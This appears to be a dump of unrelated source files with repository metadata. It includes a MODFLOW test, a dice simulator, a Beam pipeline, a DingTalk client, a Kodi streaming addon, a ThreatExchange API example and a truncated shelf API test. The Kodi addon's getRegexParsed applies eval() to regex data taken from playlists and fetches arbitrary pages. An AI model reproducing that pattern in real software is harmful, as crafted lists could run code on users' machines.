+ 0.7 * c buy_on = buy_on_list[idx] if buy_on: pd = [(0, 0.7, 0.0, "none", "none")] buy = flopy.mf6.ModflowGwfbuy( gwf, packagedata=pd, denseref=1000.0, concentration=c ) nlakeconn = 11 # note: number of connections for this lake # pak_data = [lakeno, strt, nlakeconn, dense, boundname] pak_data = [(0, 2.25, nlakeconn, lake_dense)] connlen = delr / 2.0 connwidth = delc bedleak = "None" con_data = [ # con_data=(lakeno,iconn,(cellid),claktype,bedleak,belev,telev,connlen,connwidth ) (0, 0, (0, 0, 0), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 1, (1, 0, 1), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 2, (1, 0, 1), "HORIZONTAL", 
bedleak, 10, 10, connlen, connwidth), (0, 3, (2, 0, 2), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 4, (2, 0, 2), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 5, (3, 0, 3), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 6, (2, 0, 4), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 7, (2, 0, 4), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 8, (1, 0, 5), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), (0, 9, (1, 0, 5), "VERTICAL", bedleak, 10, 10, connlen, connwidth), (0, 10, (0, 0, 6), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth), ] # period data p_data = [ (0, "STATUS", "ACTIVE"), ] # note: for specifying lake number, use fortran indexing! fname = "{}.lak.obs.csv".format(gwfname) lak_obs = { fname: [ ("lakestage", "stage", 1), ("lakevolume", "volume", 1), ("lak1", "lak", 1, 1), ("lak2", "lak", 1, 2), ("lak3", "lak", 1, 3), ("lak4", "lak", 1, 4), ("lak5", "lak", 1, 5), ("lak6", "lak", 1, 6), ("lak7", "lak", 1, 7), ("lak8", "lak", 1, 8), ("lak9", "lak", 1, 9), ("lak10", "lak", 1, 10), ("lak11", "lak", 1, 11), ], # "digits": 10, } lak = flopy.mf6.modflow.ModflowGwflak( gwf, save_flows=True, print_input=True, print_flows=True, print_stage=True, stage_filerecord="{}.lak.bin".format(gwfname), budget_filerecord="{}.lak.bud".format(gwfname), nlakes=len(pak_data), ntables=0, packagedata=pak_data, pname="LAK-1", connectiondata=con_data, perioddata=p_data, observations=lak_obs, auxiliary=["DENSITY"], ) # output control oc = flopy.mf6.ModflowGwfoc( gwf, budget_filerecord="{}.cbc".format(gwfname), head_filerecord="{}.hds".format(gwfname), headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")], saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")], printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")], ) return sim, None def eval_results(sim): print("evaluating results...") # calculate volume of water and make sure it is conserved name = ex[sim.idxsim] gwfname = "gwf_" + name fname = gwfname + ".lak.bin" fname = os.path.join(sim.simpath, fname) assert os.path.isfile(fname) bobj = flopy.utils.HeadFile(fname, text="STAGE") stage = bobj.get_alldata().flatten() # print(stage) fname = gwfname + ".hds" fname = os.path.join(sim.simpath, fname) assert os.path.isfile(fname) hobj = flopy.utils.HeadFile(fname) head = hobj.get_data() # print(head) # calculate initial water volume v0 = 3.5 * 2 # outermost columns v0 += 2.5 * 2 # next innermost columns v0 += 2.0 * 2 # next innermost columns v0 += 1.0 * 1 # middle column v0 = v0 * 0.3 # specific yield v0 = v0 + (2.25 - 2.0) * 2 + (2.25 - 1.0) print("initial volume of water in model = {}".format(v0)) # calculate ending water volume in model h = head[0, 0, 0] s = stage[-1] v = h * 4 + 2.0 * 2 + 1.0 * 1 v = v * 0.3 # specific yield v = v + (s - 2.0) * 2 + (s - 1.0) print("final volume of water in model = {}".format(v)) # check to make sure starting water volume same as equalized final volume errmsg = "initial and final water volume not equal: {} {}".format(v0, v) assert np.allclose(v0, v) # todo: add a better check of the lake concentrations # assert False # - No need to change any code below @pytest.mark.parametrize( "idx, dir", list(enumerate(exdirs)), ) def test_mf6model(idx, dir): # initialize testing framework test = testing_framework() # build the model test.build_mf6_models(build_model, idx, dir) # run the test model test.run_mf6(Simulation(dir, exfunc=eval_results, idxsim=idx)) def main(): # initialize testing framework test = testing_framework() # run the test model for idx, dir in enumerate(exdirs): 
test.build_mf6_models(build_model, idx, dir) sim = Simulation(dir, exfunc=eval_results, idxsim=idx) test.run_mf6(sim) if __name__ == "__main__": # print message print("standalone run of {}".format(os.path.basename(__file__))) # run main routine main()
29.073333
90
0.576015
0
0
0
0
332
0.038065
0
0
2,544
0.291676
beb37d345ad255de414b430caeba23a0fa10d2d1
441
py
Python
lesson-08/roll_dice_v1.0.py
hemiaoio/pylearning
4b3885ed7177db4e6e03da80dd9ed69719c8d866
[ "MIT" ]
1
2018-11-11T03:44:02.000Z
2018-11-11T03:44:02.000Z
lesson-08/roll_dice_v1.0.py
hemiaoio/learn-python
4b3885ed7177db4e6e03da80dd9ed69719c8d866
[ "MIT" ]
null
null
null
lesson-08/roll_dice_v1.0.py
hemiaoio/learn-python
4b3885ed7177db4e6e03da80dd9ed69719c8d866
[ "MIT" ]
null
null
null
""" 功能:模拟掷骰子 版本:1.0 """ import random def roll_dice(): roll = random.randint(1, 6) return roll def main(): total_times = 100000 result_list = [0] * 6 for i in range(total_times): roll = roll_dice() result_list[roll-1] += 1 for i, x in enumerate(result_list): print('点数{}的次数:{},频率:{}'.format(i+1, x, x/total_times)) print(result_list) if __name__ == '__main__': main()
15.206897
63
0.569161
0
0
0
0
0
0
0
0
101
0.20911
beb557aa11e275e2f9691dee969a012dab3f26db
759
py
Python
composer/dataflow-python3/main.py
gxercavins/gcp-snippets
a90e4e9c922370face876aa7c56db610896e1a6f
[ "Apache-2.0" ]
2
2022-02-07T07:53:35.000Z
2022-02-23T18:46:03.000Z
composer/dataflow-python3/main.py
gxercavins/gcp-snippets
a90e4e9c922370face876aa7c56db610896e1a6f
[ "Apache-2.0" ]
1
2019-10-26T19:03:34.000Z
2019-10-26T19:03:48.000Z
composer/dataflow-python3/main.py
gxercavins/gcp-snippets
a90e4e9c922370face876aa7c56db610896e1a6f
[ "Apache-2.0" ]
6
2020-03-19T23:58:46.000Z
2022-02-07T07:53:37.000Z
import argparse
import logging

import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions


def run(argv=None, save_main_session=True):
    """Dummy pipeline to test Python3 operator."""
    parser = argparse.ArgumentParser()
    known_args, pipeline_args = parser.parse_known_args(argv)

    pipeline_options = PipelineOptions(pipeline_args)
    pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
    p = beam.Pipeline(options=pipeline_options)

    # Just a simple test
    p | 'Create Events' >> beam.Create([1, 2, 3])

    result = p.run()
    result.wait_until_finish()


if __name__ == '__main__':
    logging.getLogger().setLevel(logging.INFO)
    run()
27.107143
78
0.777339
0
0
0
0
0
0
0
0
91
0.119895
beb680071d94ed8dd93dc11b2e313714df1f9b83
1,727
py
Python
dingtalk/message/conversation.py
kangour/dingtalk-python
b37b9dac3ca3ff9d727308fb120a8fd05e11eaa5
[ "Apache-2.0" ]
88
2017-12-28T05:23:15.000Z
2021-12-20T13:44:18.000Z
dingtalk/message/conversation.py
niulinlnc/dingtalk-python
c4209658f88344e8f0890137ed7c887c8b740a6c
[ "Apache-2.0" ]
8
2018-04-28T05:41:49.000Z
2021-06-01T21:51:11.000Z
dingtalk/message/conversation.py
niulinlnc/dingtalk-python
c4209658f88344e8f0890137ed7c887c8b740a6c
[ "Apache-2.0" ]
43
2017-12-07T09:43:48.000Z
2021-12-03T01:19:52.000Z
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2017/11/30 3:02 PM
# @Author  : Matrix
# @Github  : https://github.com/blackmatrix7/
# @Blog    : http://www.cnblogs.com/blackmatrix/
# @File    : messages.py
# @Software: PyCharm
import json
from ..foundation import *
from json import JSONDecodeError

__author__ = 'blackmatrix'

__all__ = ['async_send_msg', 'get_msg_send_result', 'get_msg_send_progress']


@dingtalk_resp
def async_send_msg(access_token, msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None, to_all_user=False):
    try:
        msgcontent = json.dumps(msgcontent)
    except JSONDecodeError:
        # If the given msgcontent cannot be converted to JSON, pass it to DingTalk as-is and let DingTalk handle it
        pass
    if not isinstance(userid_list, str):
        userid_list = ','.join(userid_list)
    args = locals().copy()
    payload = {}
    # assemble the request parameters
    for k, v in args.items():
        if k in ('msgtype', 'agent_id', 'msgcontent', 'userid_list', 'dept_id_list'):
            if v is not None:
                payload.update({k: v})
    resp = call_dingtalk_webapi(access_token, 'dingtalk.corp.message.corpconversation.asyncsend', **payload)
    return resp


@dingtalk_resp
def get_msg_send_result(access_token, agent_id, task_id):
    url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendresult')
    payload = {'task_id': task_id, 'agent_id': agent_id}
    return requests.get(url, params=payload)


@dingtalk_resp
def get_msg_send_progress(access_token, agent_id, task_id):
    url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendprogress')
    payload = {'task_id': task_id, 'agent_id': agent_id}
    return requests.get(url, params=payload)


if __name__ == '__main__':
    pass
31.981481
120
0.70469
0
0
0
0
1,337
0.745678
0
0
676
0.377022
beb69b31ba90004b6f8731fea0065e0f64e36216
1,412
py
Python
backend/garpix_page/setup.py
griviala/garpix_page
55f1d9bc6d1de29d18e15369bebcbef18811b5a4
[ "MIT" ]
null
null
null
backend/garpix_page/setup.py
griviala/garpix_page
55f1d9bc6d1de29d18e15369bebcbef18811b5a4
[ "MIT" ]
null
null
null
backend/garpix_page/setup.py
griviala/garpix_page
55f1d9bc6d1de29d18e15369bebcbef18811b5a4
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages
from os import path

here = path.join(path.abspath(path.dirname(__file__)), 'garpix_page')

with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='garpix_page',
    version='2.23.0',
    description='',
    long_description=long_description,
    url='https://github.com/garpixcms/garpix_page',
    author='Garpix LTD',
    author_email='[email protected]',
    license='MIT',
    packages=find_packages(exclude=['testproject', 'testproject.*']),
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Framework :: Django',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
    include_package_data=True,
    zip_safe=False,
    install_requires=[
        'Django >= 1.11',
        'django-polymorphic-tree-for-garpix-page >= 2.1.1',
        'django-modeltranslation >= 0.16.2',
        'django-multiurl >= 1.4.0',
        'djangorestframework >= 3.12.4',
        'garpix_utils >= 1.4.0',
        'django-tabbed-admin >= 1.0.4',
        'model-bakery >= 1.4.0'
    ],
)
32.090909
69
0.607649
0
0
0
0
0
0
0
0
736
0.521246
beb76b3debe06f273a8ef3ec32c53943cd031a3b
20,225
py
Python
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py
C6SUMMER/allinclusive-kodi-pi
8baf247c79526849c640c6e56ca57a708a65bd11
[ "Apache-2.0" ]
null
null
null
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py
C6SUMMER/allinclusive-kodi-pi
8baf247c79526849c640c6e56ca57a708a65bd11
[ "Apache-2.0" ]
null
null
null
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py
C6SUMMER/allinclusive-kodi-pi
8baf247c79526849c640c6e56ca57a708a65bd11
[ "Apache-2.0" ]
2
2018-04-17T17:34:39.000Z
2020-07-26T03:43:33.000Z
# -*- coding: utf-8 -*- """ p2p-streams (c) 2014 enen92 fightnight This file contains the livestream addon engine. It is mostly based on divingmule work on livestreams addon! Functions: xml_lists_menu() -> main menu for the xml list category addlista() -> add a new list. It'll ask for local or remote and processes the given input remove_list(name) -> Remove a list get_groups(url) -> First regex function to parse a given list. Sopcast type list get_channels(name,url) -> Second regex function to parse a given list. Used to general livestreams xml type lists getData(url,fanart) -> Get the item data such as iconimage, fanart, etc getChannelItems(name,url,fanart) -> Function to grab the channel items getItems(items,fanart) -> Function to grab the items from the xml removeNonAscii(s) -> Function to remove non-ascii characters from the list getSoup(url) -> uses beautifulsoup to parse a remote xml addon_log(string) -> Simple log/print function getRegexParsed(regexs, url) -> parse the regex expression list_type(url) -> Checks if the list is xml or m3u parse_m3u(url) -> Parses a m3u type list """ import urllib,urllib2,re,xbmcplugin,xbmcgui,xbmc,xbmcaddon,HTMLParser,time,datetime,os,xbmcvfs,sys from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP from peertopeerutils.pluginxbmc import * from peertopeerutils.webutils import * from peertopeerutils.directoryhandle import * from peertopeerutils.iofile import * """ Main Menu """ def xml_lists_menu(): if settings.getSetting('sopcast-oficial') == "true": addDir(translate(40116),"http://sopcast.org/chlist.xml",101,addonpath + art + 'xml_list_sopcast.png',2,True) try: if os.path.exists(os.path.join(pastaperfil,"Lists")): dirs, files = xbmcvfs.listdir(os.path.join(pastaperfil,"Lists")) for file in files: f = open(os.path.join(pastaperfil,"Lists",file), "r") string = f.read() if xbmcvfs.exists(os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg'))):addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True,fan_art=os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg'))) else: addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True) except: pass addDir(translate(40121),MainURL,107,addonpath + art + 'plus-menu.png',2,False) #xbmc.executebuiltin("Container.SetViewMode(51)") """ Add a new list function """ def addlista(): opcao= xbmcgui.Dialog().yesno(translate(40000), translate(40123),"","",translate(40124),translate(40125)) if opcao: dialog = xbmcgui.Dialog() lista_xml = dialog.browse(int(1), translate(40186), 'myprograms','.xml|.m3u') keybdois = xbmc.Keyboard("", translate(40130)) keybdois.doModal() if (keybdois.isConfirmed()): searchname = keybdois.getText() if searchname=='': sys.exit(0) encode=urllib.quote(searchname) if xbmcvfs.exists(os.path.join(pastaperfil,"Lists")): pass else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists")) txt_name = searchname + ".txt" save(os.path.join(pastaperfil,"Lists",txt_name),lista_xml) mensagemok(translate(40000),translate(40129)) xbmc.executebuiltin("XBMC.Container.Refresh") else: keyb = xbmc.Keyboard("", translate(40127)) keyb.doModal() if (keyb.isConfirmed()): search = keyb.getText() if search=='': sys.exit(0) if "dropbox" in search and not "?dl=1" in search: search = search + '?dl=1' if "xml" not in search.split(".")[-1] and "m3u" not in search.split(".")[-1]: mensagemok(translate(40000),translate(40128)); sys.exit(0) else: try: code = 
get_page_source(search) except: mensagemok(translate(40000),translate(40128)) sys.exit(0) keybdois = xbmc.Keyboard("", translate(40130)) keybdois.doModal() if (keybdois.isConfirmed()): searchname = keybdois.getText() if searchname=='': sys.exit(0) encode=urllib.quote(searchname) if os.path.exists(os.path.join(pastaperfil,"Lists")): pass else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists")) txt_name = searchname + ".txt" save(os.path.join(pastaperfil,"Lists",txt_name),search) mensagemok(translate(40000),translate(40129)) xbmc.executebuiltin("XBMC.Container.Refresh") """ Remove a List """ def remove_list(name): xbmcvfs.delete(name) xbmc.executebuiltin("Notification(%s,%s,%i,%s)" % (translate(40000), translate(40150), 1,addonpath+"/icon.png")) xbmc.executebuiltin("Container.Refresh") """ Parsing functions """ def list_type(url): ltype = url.split('.')[-1] if 'xml' in ltype: get_groups(url) elif 'm3u' in ltype: parse_m3u(url) else: pass def parse_m3u(url): if "http" in url: content = get_page_source(url) else: content = readfile(url) match = re.compile('#EXTINF:.+?,(.*?)\n(.*?)(?:\r|\n)').findall(content) for channel_name,stream_url in match: if 'plugin://' in stream_url: stream_url = 'XBMC.RunPlugin('+stream_url+')' addDir(channel_name,stream_url,106,'',1,False) elif 'sop://' in stream_url: addDir(channel_name,stream_url,2,'',1,False) elif ('acestream://' in stream_url) or ('.acelive' in stream_url) or ('.torrent' in stream_url): addDir(channel_name,stream_url,1,'',1,False) else: addLink(channel_name,stream_url,'') def get_groups(url): from xml.etree import ElementTree try: print("Sopcast xml-type list detected") if "http" in url: source = get_page_source(url) save(os.path.join(pastaperfil,"working.xml"),source) workingxml = os.path.join(pastaperfil,"working.xml") else: workingxml = url groups = ElementTree.parse(workingxml).findall('.//group') unname_group_index = 1 LANGUAGE = "en" for group in groups: if group.attrib[LANGUAGE] == "": group.attrib[LANGUAGE] = str(unname_group_index) unname_group_index = unname_group_index + 1 if re.sub('c','e',LANGUAGE) == LANGUAGE: OTHER_LANG = re.sub('e','c',LANGUAGE) else: OTHER_LANG = re.sub('c','e',LANGUAGE) if LANGUAGE == "cn": try: if len(group.attrib[OTHER_LANG]) > 0: group.attrib[LANGUAGE] = group.attrib[OTHER_LANG] unname_group_index = unname_group_index - 1 except: pass if (group.find('.//channel')==None): continue group_name=group.attrib[LANGUAGE] try: addDir_livestreams_common(group_name,url,102,addonpath + art + 'xml_list_sopcast.png',True) except: pass #xbmc.executebuiltin("Container.SetViewMode(51)") except: print("Other type of xml list") getData(url,"") def get_channels(name,url): from xml.etree import ElementTree if url.startswith('http://'): source = get_page_source(url) else: source = readfile(url) save(os.path.join(pastaperfil,"working.xml"),source) chlist_tree = ElementTree.parse(os.path.join(pastaperfil,"working.xml")) LANGUAGE = "en" groups = ElementTree.parse(os.path.join(pastaperfil,"working.xml")).findall('.//group') for group in groups: if group.attrib[LANGUAGE].encode('utf-8') == name: channels = group.findall('.//channel') for channel in channels: try: try: title = channel.find('.//name').attrib['en'].encode('utf-8') except: title = '' if not title: try: title = channel.find('.//name').attrib['cn'].encode('utf-8') except: title = '' if not title: try: title = channel.find('.//name').text except: title = '' tipo = channel.find('.//stream_type').text sop_address = channel.find('.//item').text if not tipo: tipo = "N/A" if not 
title: title = "N/A" thumbnail = "" try: thumbnail = channel.find('.//thumbnail').text except: pass if sop_address: if thumbnail == "": thumbnail = addonpath + art + 'sopcast_link.png' try: addDir_livestreams_common('[B][COLOR orange]' + title + ' [/B][/COLOR](' + tipo +')',sop_address,2,thumbnail,False) except:pass else: pass except: pass else: pass def getData(url,fanart): soup = getSoup(url) if len(soup('channels')) > 0: channels = soup('channel') for channel in channels: name = channel('name')[0].string thumbnail = channel('thumbnail')[0].string if thumbnail == None: thumbnail = '' try: if not channel('fanart'): if addon.getSetting('use_thumb') == "true": fanArt = thumbnail else: fanArt = fanart else: fanArt = channel('fanart')[0].string if fanArt == None: raise except: fanArt = fanart try: desc = channel('info')[0].string if desc == None: raise except: desc = '' try: genre = channel('genre')[0].string if genre == None: raise except: genre = '' try: date = channel('date')[0].string if date == None: raise except: date = '' try: credits = channel('credits')[0].string if credits == None: raise except: credits = '' try: addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),103,thumbnail,fanArt,desc,genre,date,credits,True) except: addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore')) else: addon_log('No Channels: getItems') getItems(soup('item'),fanart) def getChannelItems(name,url,fanart): soup = getSoup(url) channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')}) items = channel_list('item') try: fanArt = channel_list('fanart')[0].string if fanArt == None: raise except: fanArt = fanart for channel in channel_list('subchannel'): name = channel('name')[0].string try: thumbnail = channel('thumbnail')[0].string if thumbnail == None: raise except: thumbnail = '' try: if not channel('fanart'): if addon.getSetting('use_thumb') == "true": fanArt = thumbnail else: fanArt = channel('fanart')[0].string if fanArt == None: raise except: pass try: desc = channel('info')[0].string if desc == None: raise except: desc = '' try: genre = channel('genre')[0].string if genre == None: raise except: genre = '' try: date = channel('date')[0].string if date == None: raise except: date = '' try: credits = channel('credits')[0].string if credits == None: raise except: credits = '' try: addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date) except: addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore')) getItems(items,fanArt) def getItems(items,fanart): total = len(items) addon_log('Total Items: %s' %total) for item in items: try: name = item('title')[0].string if name is None: name = 'unknown?' 
except: addon_log('Name Error') name = '' try: if item('epg'): if item.epg_url: addon_log('Get EPG Regex') epg_url = item.epg_url.string epg_regex = item.epg_regex.string epg_name = get_epg(epg_url, epg_regex) if epg_name: name += ' - ' + epg_name elif item('epg')[0].string > 1: name += getepg(item('epg')[0].string) else: pass except: addon_log('EPG Error') try: url = [] for i in item('link'): if not i.string == None: url.append(i.string) if len(url) < 1: raise except: addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore')) continue try: thumbnail = item('thumbnail')[0].string if thumbnail == None: raise except: thumbnail = '' try: if not item('fanart'): if addon.getSetting('use_thumb') == "true": fanArt = thumbnail else: fanArt = fanart else: fanArt = item('fanart')[0].string if fanArt == None: raise except: fanArt = fanart try: desc = item('info')[0].string if desc == None: raise except: desc = '' try: genre = item('genre')[0].string if genre == None: raise except: genre = '' try: date = item('date')[0].string if date == None: raise except: date = '' regexs = None if item('regex'): try: regexs = {} for i in item('regex'): regexs[i('name')[0].string] = {} regexs[i('name')[0].string]['expre'] = i('expres')[0].string regexs[i('name')[0].string]['page'] = i('page')[0].string try: regexs[i('name')[0].string]['refer'] = i('referer')[0].string except: addon_log("Regex: -- No Referer --") try: regexs[i('name')[0].string]['agent'] = i('agent')[0].string except: addon_log("Regex: -- No User Agent --") regexs = urllib.quote(repr(regexs)) except: regexs = None addon_log('regex Error: '+name.encode('utf-8', 'ignore')) try: if "RunPlugin" in url[0]: try: addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],106,thumbnail,fanArt,desc,genre,"credits",date) except: match = re.compile("&name=(.+?)\)").findall(url[0].replace(";","")) if match: try: addDir_livestreams(name.encode('utf-8', 'ignore'),removeNonAscii(url[0]),106,thumbnail,fanArt,desc,genre,credits,date) except: try: addDir_livestreams(removeNonAscii(name.encode('utf-8', 'ignore')),removeNonAscii(url[0].replace(";","")),106,thumbnail,fanArt,desc,genre,credits,date) except: addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore')) else: addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore')) else: if ('acestream://' in url[0]) or ('.acelive' in url[0]) or ('.torrent' in url[0]): if 'plugin://' not in url[0]: addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],1,thumbnail,fanArt,desc,genre,"credits",date) else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total) elif 'sop://' in url[0]: if 'plugin://' not in url[0]: addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],2,thumbnail,fanArt,desc,genre,"credits",date) else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total) else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total) except: addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore')) def removeNonAscii(s): return "".join(filter(lambda x: ord(x)<128, s)) def getSoup(url): if url.startswith('http://'): data = makeRequest(url) else: if xbmcvfs.exists(url): if url.startswith("smb://") or url.startswith("nfs://"): copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt')) if copy: data = 
open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read() xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt')) else: addon_log("failed to copy from smb:") else: data = open(url, 'r').read() else: addon_log("Soup Data not found!") return return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES) def addon_log(string): print(string) def getRegexParsed(regexs, url): regexs = eval(urllib.unquote(regexs)) cachedPages = {} doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url) for k in doRegexs: if k in regexs: m = regexs[k] if m['page'] in cachedPages: link = cachedPages[m['page']] else: req = urllib2.Request(m['page']) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1') if 'refer' in m: req.add_header('Referer', m['refer']) if 'agent' in m: req.add_header('User-agent', m['agent']) response = urllib2.urlopen(req) link = response.read() response.close() cachedPages[m['page']] = link reg = re.compile(m['expre']).search(link) url = url.replace("$doregex[" + k + "]", reg.group(1).strip()) item = xbmcgui.ListItem(path=url) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
38.745211
303
0.514907
0
0
0
0
0
0
0
0
4,037
0.199604
beb77481d7d9ef64134079c15cf78aedfbcf66f2
187
py
Python
RainIt/rain_it/ric/Procedure.py
luisgepeto/RainItPi
47cb7228e9c584c3c4489ebc78abf6de2096b770
[ "MIT" ]
null
null
null
RainIt/rain_it/ric/Procedure.py
luisgepeto/RainItPi
47cb7228e9c584c3c4489ebc78abf6de2096b770
[ "MIT" ]
null
null
null
RainIt/rain_it/ric/Procedure.py
luisgepeto/RainItPi
47cb7228e9c584c3c4489ebc78abf6de2096b770
[ "MIT" ]
null
null
null
from ric.RainItComposite import RainItComposite


class Procedure(RainItComposite):

    def __init__(self):
        super().__init__()

    def get_pickle_form(self):
        return self
18.7
47
0.705882
136
0.727273
0
0
0
0
0
0
0
0
beb861661de128962032b82c144ceaca4b7cc85f
81
py
Python
1067.py
FahimFBA/URI-Problem-Solve
d718a95e5a873dffbce19d850998e8917ec87ebb
[ "Apache-2.0" ]
3
2020-11-25T19:05:31.000Z
2021-03-29T07:29:36.000Z
1067.py
FahimFBA/URI-Problem-Solve
d718a95e5a873dffbce19d850998e8917ec87ebb
[ "Apache-2.0" ]
null
null
null
1067.py
FahimFBA/URI-Problem-Solve
d718a95e5a873dffbce19d850998e8917ec87ebb
[ "Apache-2.0" ]
null
null
null
valor = int(input())

for i in range(valor+1):
    if(i%2 != 0):
        print(i)
16.2
24
0.506173
0
0
0
0
0
0
0
0
0
0
beb987a1f2b8198bf13096fe552301ac5d99117d
889
py
Python
api-reference-examples/python/te-tag-query/api-example-update.py
b-bold/ThreatExchange
6f8d0dc803faccf576c9398569bb52d54a4f9a87
[ "BSD-3-Clause" ]
997
2015-03-13T18:04:03.000Z
2022-03-30T12:09:10.000Z
api-reference-examples/python/te-tag-query/api-example-update.py
b-bold/ThreatExchange
6f8d0dc803faccf576c9398569bb52d54a4f9a87
[ "BSD-3-Clause" ]
444
2015-03-26T17:28:49.000Z
2022-03-28T19:34:05.000Z
api-reference-examples/python/te-tag-query/api-example-update.py
b-bold/ThreatExchange
6f8d0dc803faccf576c9398569bb52d54a4f9a87
[ "BSD-3-Clause" ]
294
2015-03-13T22:19:43.000Z
2022-03-30T08:42:45.000Z
#!/usr/bin/env python

# ================================================================
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ================================================================

import sys
import json
import TE

TE.Net.setAppTokenFromEnvName("TX_ACCESS_TOKEN")

postParams = {
    "descriptor_id": "4036655176350945",  # ID of the descriptor to be updated
    "reactions": "INGESTED,IN_REVIEW",
}

showURLs = False
dryRun = False

validationErrorMessage, serverSideError, responseBody = TE.Net.updateThreatDescriptor(
    postParams, showURLs, dryRun
)

if validationErrorMessage != None:
    sys.stderr.write(validationErrorMessage + "\n")
    sys.exit(1)

if serverSideError != None:
    sys.stderr.write(str(serverSideError) + "\n")
    sys.stderr.write(json.dumps(responseBody) + "\n")
    sys.exit(1)

print(json.dumps(responseBody))
26.147059
86
0.620922
0
0
0
0
0
0
0
0
352
0.395951
beb9a541895990f03cef5c41fda543323a1a2725
12,362
py
Python
loaner/web_app/backend/api/shelf_api_test.py
Bottom-Feeders/GrabNGO
5a467362e423700a5a7276a7fa9a47040033cfcf
[ "Apache-2.0" ]
null
null
null
loaner/web_app/backend/api/shelf_api_test.py
Bottom-Feeders/GrabNGO
5a467362e423700a5a7276a7fa9a47040033cfcf
[ "Apache-2.0" ]
null
null
null
loaner/web_app/backend/api/shelf_api_test.py
Bottom-Feeders/GrabNGO
5a467362e423700a5a7276a7fa9a47040033cfcf
[ "Apache-2.0" ]
null
null
null
# Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for backend.api.shelf_api.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import parameterized import mock from protorpc import message_types from google.appengine.api import search import endpoints from loaner.web_app.backend.api import root_api # pylint: disable=unused-import from loaner.web_app.backend.api import shelf_api from loaner.web_app.backend.api.messages import shared_messages from loaner.web_app.backend.api.messages import shelf_messages from loaner.web_app.backend.models import device_model from loaner.web_app.backend.models import shelf_model # pylint: disable=unused-import from loaner.web_app.backend.testing import loanertest class ShelfApiTest(parameterized.TestCase, loanertest.EndpointsTestCase): """Test for the Shelf API.""" def setUp(self): super(ShelfApiTest, self).setUp() self.patcher_directory = mock.patch( '__main__.device_model.directory.DirectoryApiClient') self.mock_directoryclass = self.patcher_directory.start() self.addCleanup(self.patcher_directory.stop) self.service = shelf_api.ShelfApi() self.login_admin_endpoints_user() self.patcher_xsrf = mock.patch( '__main__.shelf_api.root_api.Service.check_xsrf_token') self.shelf = 